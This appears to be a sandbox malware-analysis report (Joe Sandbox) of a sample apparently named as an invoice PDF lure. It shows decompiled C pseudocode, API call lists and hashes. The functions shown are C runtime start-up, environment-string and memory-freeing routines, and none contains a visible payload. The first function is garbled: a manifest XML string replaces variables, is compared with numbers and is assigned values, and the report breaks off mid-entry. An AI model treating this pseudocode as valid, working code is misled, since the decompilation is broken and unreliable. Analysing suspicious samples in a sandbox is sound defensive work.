                            					_t129 = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n";
                            					if("urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" != 0) {
                            						E6E2F4E29(_t103, __edi, _t111, 7);
                            						asm("int3");
                            						E6E2F5090(1, __edi, 0x6e3f7600, 0x10);
                            						_t48 =  *0x6e3f8a48; // 0x1
                            						__eflags = _t48;
                            						if(_t48 > 0) {
                            							 *0x6e3f8a48 = _t48 - 1;
                            							 *(_t121 - 0x1c) = 1;
                            							 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
                            							 *((char*)(_t121 - 0x20)) = E6E2F4B2A();
                            							 *(_t121 - 4) = 1;
                            							__eflags = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" - 2;
                            							if("urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" != 2) {
                            								E6E2F4E29(_t103, 1, _t111, 7);
                            								asm("int3");
                            								E6E2F5090(1, 1, 0x6e3f7628, 0xc);
                            								_t108 =  *(_t121 + 0xc);
                            								__eflags = _t108;
                            								if(_t108 != 0) {
                            									L23:
                            									 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
                            									__eflags = _t108 - 1;
                            									if(_t108 == 1) {
                            										L26:
                            										_t84 =  *(_t121 + 0x10);
                            										_t113 = E6E2F463E( *((intOrPtr*)(_t121 + 8)), _t108, _t84);
                            										 *(_t121 - 0x1c) = _t113;
                            										__eflags = _t113;
                            										if(_t113 != 0) {
                            											_t113 = E6E2F4329(_t88,  *((intOrPtr*)(_t121 + 8)), _t108, _t84);
                            											 *(_t121 - 0x1c) = _t113;
                            											__eflags = _t113;
                            											if(_t113 != 0) {
                            												goto L28;
                            											}
                            										}
                            									} else {
                            										__eflags = _t108 - 2;
                            										if(_t108 == 2) {
                            											goto L26;
                            										} else {
                            											_t84 =  *(_t121 + 0x10);
                            											L28:
                            											_push(_t84);
                            											_t113 = E6E2F4A3C( *((intOrPtr*)(_t121 + 8)), _t108);
                            											 *(_t121 - 0x1c) = _t113;
                            											__eflags = _t108 - 1;
                            											if(_t108 == 1) {
                            												__eflags = _t113;
                            												if(_t113 == 0) {
                            													_push(_t84);
                            													_t59 = E6E2F4A3C( *((intOrPtr*)(_t121 + 8)), _t56);
                            													__eflags = _t84;
                            													_t34 = _t84 != 0;
                            													__eflags = _t34;
                            													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
                            													L14();
                            													_pop(_t88);
                            													E6E2F463E( *((intOrPtr*)(_t121 + 8)), _t113, _t84);
                            												}
                            											}
                            											__eflags = _t108;
                            											if(_t108 == 0) {
                            												L33:
                            												_t113 = E6E2F4329(_t88,  *((intOrPtr*)(_t121 + 8)), _t108, _t84);
                            												 *(_t121 - 0x1c) = _t113;
                            												__eflags = _t113;
                            												if(_t113 != 0) {
                            													_t113 = E6E2F463E( *((intOrPtr*)(_t121 + 8)), _t108, _t84);
                            													 *(_t121 - 0x1c) = _t113;
                            												}
                            											} else {
                            												__eflags = _t108 - 3;
                            												if(_t108 == 3) {
                            													goto L33;
                            												}
                            											}
                            										}
                            									}
                            									 *(_t121 - 4) = 0xfffffffe;
                            									_t54 = _t113;
                            								} else {
                            									__eflags =  *0x6e3f8a48 - _t108; // 0x1
                            									if(__eflags > 0) {
                            										goto L23;
                            									} else {
                            										_t54 = 0;
                            									}
                            								}
                            								 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0x10));
                            								return _t54;
                            							} else {
                            								E6E2F4A6A(E6E2F4BF5());
                            								E6E2F5058();
                            								"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" & 0x00000000;
                            								 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
                            								E6E2F4518();
                            								_t67 = E6E2F4D96( *((intOrPtr*)(_t121 + 8)), 0);
                            								asm("sbb esi, esi");
                            								_t117 =  ~(_t67 & 0x000000ff) & 1;
                            								__eflags = _t117;
                            								 *(_t121 - 0x1c) = _t117;
                            								 *(_t121 - 4) = 0xfffffffe;
                            								E6E2F4525();
                            								_t69 = _t117;
                            								goto L18;
                            							}
                            						} else {
                            							_t69 = 0;
                            							L18:
                            							 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0x10));
                            							return _t69;
                            						}
                            					} else {
                            						"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" = 1;
                            						if(E6E2F4B87(_t129) != 0) {
                            							E6E2F4A5E(E6E2F502C());
                            							_t79 = E6E2F4A7C();
                            							_push(0x6e2f6148);
                            							L6E2F54A8();
                            							_t100 = 0x6e2f6144;
                            							if(_t79 == 0 && E6E2F4B5C(_t100) != 0) {
                            								_push(0x6e2f6140);
                            								_push(0x6e2f613c);
                            								L6E2F54A2();
                            								"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" = 2;
                            								_t83 = 0;
                            								 *((char*)(_t121 - 0x19)) = 0;
                            							}
                            						}
                            						 *(_t121 - 4) = 0xfffffffe;
                            						E6E2F445F();
                            						if(_t83 != 0) {
                            							goto L11;
                            						} else {
                            							_t119 = E6E2F4E23();
                            							if( *_t119 != 0) {
                            								_push(_t119);
                            								if(E6E2F4CE5() != 0) {
                            									 *0x6e2f6134( *((intOrPtr*)(_t121 + 8)), 2,  *(_t121 + 0xc));
                            									 *((intOrPtr*)( *_t119))();
                            								}
                            							}
                            							 *0x6e3f8a48 =  *0x6e3f8a48 + 1;
                            							_t44 = 1;
                            						}
                            						L12:
                            						 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0x10));
                            						return _t44;
                            					}
                            				}
                            			}

                            APIs
                            • __RTC_Initialize.LIBCMT ref: 6E2F43C9
                              • Part of subcall function 6E2F4A5E: InitializeSListHead.KERNEL32(6E3F8D70,6E2F43D3,6E3F75E0,00000010,6E2F4364,?,?,?,6E2F458C,?,00000001,?,?,00000001,?,6E3F7628), ref: 6E2F4A63
                            • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6E2F6144,6E2F6148,6E3F75E0,00000010,6E2F4364,?,?,?,6E2F458C,?,00000001,?,?,00000001,?,6E3F7628), ref: 6E2F43E2
                            • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6E2F613C,6E2F6140,6E3F75E0,00000010,6E2F4364,?,?,?,6E2F458C,?,00000001,?,?,00000001,?,6E3F7628), ref: 6E2F4400
                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2F4433
                            • ___scrt_fastfail.LIBCMT ref: 6E2F447D
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                            • String ID:
                            • API String ID: 3966955261-0
                            • Opcode ID: cce941fa78df43f880550f30ce53ad22faff2b9c0c70a7b8b1fd5fd4205965e5
                            • Instruction ID: 3b228a6d86251e060c4ddf1d2fe3f738722df2211e248ab10ccb643d02b5ee85
                            • Opcode Fuzzy Hash: cce941fa78df43f880550f30ce53ad22faff2b9c0c70a7b8b1fd5fd4205965e5
                            • Instruction Fuzzy Hash: 5F21CD3AAC420EDBDF009BF496207DDF7AB9F5222AF144819D4526B282DFE14043D665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E01327C60() {
                            				int _v8;
                            				void* __ecx;
                            				void* _t6;
                            				int _t7;
                            				char* _t13;
                            				int _t17;
                            				void* _t19;
                            				char* _t25;
                            				WCHAR* _t27;
                            
                            				_t27 = GetEnvironmentStringsW();
                            				if(_t27 == 0) {
                            					L7:
                            					_t13 = 0;
                            				} else {
                            					_t6 = E01327C29(_t27);
                            					_pop(_t19);
                            					_t17 = _t6 - _t27 >> 1;
                            					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                            					_v8 = _t7;
                            					if(_t7 == 0) {
                            						goto L7;
                            					} else {
                            						_t25 = E01320A25(_t19, _t7);
                            						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                            							_t13 = 0;
                            						} else {
                            							_t13 = _t25;
                            							_t25 = 0;
                            						}
                            						E013209EB(_t25);
                            					}
                            				}
                            				if(_t27 != 0) {
                            					FreeEnvironmentStringsW(_t27);
                            				}
                            				return _t13;
                            			}

                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 01327C69
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01327C8C
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01327CB2
                            • _free.LIBCMT ref: 01327CC5
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01327CD4
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: 1d4dc60c36fd934cfeeda0e8cd01b365105eb486c028fb268a0edd87aaca5802
                            • Instruction ID: df37e526d0434a0cd369ce64ff282b53be1677698fa0949e87314868d07fd239
                            • Opcode Fuzzy Hash: 1d4dc60c36fd934cfeeda0e8cd01b365105eb486c028fb268a0edd87aaca5802
                            • Instruction Fuzzy Hash: DC0184726012397FFB25767A5D88C7F7D6DFED2EA8714012DFA04C3204DA608C0182B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 81%
                            			E013244A9(void* __ecx) {
                            				intOrPtr _t2;
                            				void* _t4;
                            				void* _t10;
                            				void* _t11;
                            				void* _t13;
                            				void* _t15;
                            				long _t16;
                            
                            				_t11 = __ecx;
                            				_t16 = GetLastError();
                            				_t10 = 0;
                            				_t2 =  *0x133c238; // 0x6
                            				_t19 = _t2 - 0xffffffff;
                            				if(_t2 == 0xffffffff) {
                            					L2:
                            					_t15 = E01320B10(_t11, 1, 0x364);
                            					_pop(_t13);
                            					if(_t15 != 0) {
                            						_t4 = E01323862(_t13, __eflags,  *0x133c238, _t15);
                            						__eflags = _t4;
                            						if(_t4 != 0) {
                            							E01324297(_t13, _t15, 0x13463f0);
                            							E013209EB(_t10);
                            							__eflags = _t15;
                            							if(_t15 != 0) {
                            								goto L9;
                            							} else {
                            								goto L8;
                            							}
                            						} else {
                            							_push(_t15);
                            							goto L4;
                            						}
                            					} else {
                            						_push(_t10);
                            						L4:
                            						E013209EB();
                            						L8:
                            						SetLastError(_t16);
                            					}
                            				} else {
                            					_t15 = E0132380C(_t11, _t19, _t2);
                            					if(_t15 != 0) {
                            						L9:
                            						SetLastError(_t16);
                            						_t10 = _t15;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            				return _t10;
                            			}

                            APIs
                            • GetLastError.KERNEL32(?,?,?,0131C9D3,01320B62,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 013244AE
                            • _free.LIBCMT ref: 013244E3
                            • _free.LIBCMT ref: 0132450A
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324517
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324520
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 33da1ada3be81f45ddc4d0d75b96493c7aed9c06dfc422aaec99d16710cb06ad
                            • Instruction ID: e2ee204e82f04d08dde2e9175464667eb0a54b2a2cb2e8f7cc3d7b8f2265c890
                            • Opcode Fuzzy Hash: 33da1ada3be81f45ddc4d0d75b96493c7aed9c06dfc422aaec99d16710cb06ad
                            • Instruction Fuzzy Hash: BE017833200732A7C227763D5C48E2B26AEDFC1A7CF300126F90AF3541EF60C8058261
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01327E7E(intOrPtr* _a4) {
                            				intOrPtr _t6;
                            				intOrPtr* _t21;
                            				void* _t23;
                            				void* _t24;
                            				void* _t25;
                            				void* _t26;
                            				void* _t27;
                            
                            				_t21 = _a4;
                            				if(_t21 != 0) {
                            					_t23 =  *_t21 -  *0x133c838; // 0x133c830
                            					if(_t23 != 0) {
                            						E013209EB(_t7);
                            					}
                            					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x133c83c; // 0x1346555
                            					if(_t24 != 0) {
                            						E013209EB(_t8);
                            					}
                            					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x133c840; // 0x1346555
                            					if(_t25 != 0) {
                            						E013209EB(_t9);
                            					}
                            					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x133c868; // 0x133c834
                            					if(_t26 != 0) {
                            						E013209EB(_t10);
                            					}
                            					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                            					_t27 = _t6 -  *0x133c86c; // 0x1346558
                            					if(_t27 != 0) {
                            						return E013209EB(_t6);
                            					}
                            				}
                            				return _t6;
                            			}

                            APIs
                            • _free.LIBCMT ref: 01327E96
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01327EA8
                            • _free.LIBCMT ref: 01327EBA
                            • _free.LIBCMT ref: 01327ECC
                            • _free.LIBCMT ref: 01327EDE
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 8ff0f46a05a932df378159efa820dbda946f25f689ef394419409ab501b74325
                            • Instruction ID: 9f0fc0fffab5b5df90b5786edacd0b08afae64de6f7a1e93bcd8a6d61d340e75
                            • Opcode Fuzzy Hash: 8ff0f46a05a932df378159efa820dbda946f25f689ef394419409ab501b74325
                            • Instruction Fuzzy Hash: 53F0FF32604224ABE624FB5DE482C1B7BEDBA14B28B641807F14DEB514C730FC8087A8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E01320833(signed int __ecx) {
                            				intOrPtr _t7;
                            
                            				asm("lock xadd [eax], ecx");
                            				if((__ecx | 0xffffffff) == 0) {
                            					_t7 =  *0x133c828; // 0xe4f420
                            					if(_t7 != 0x133c608) {
                            						E013209EB(_t7);
                            						 *0x133c828 = 0x133c608;
                            					}
                            				}
                            				E013209EB( *0x134630c);
                            				 *0x134630c = 0;
                            				E013209EB( *0x1346310);
                            				 *0x1346310 = 0;
                            				E013209EB( *0x1345e70);
                            				 *0x1345e70 = 0;
                            				E013209EB( *0x1345e74);
                            				 *0x1345e74 = 0;
                            				return 1;
                            			}

                            APIs
                            • _free.LIBCMT ref: 01320851
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01320863
                            • _free.LIBCMT ref: 01320876
                            • _free.LIBCMT ref: 01320887
                            • _free.LIBCMT ref: 01320898
                            Memory Dump Source
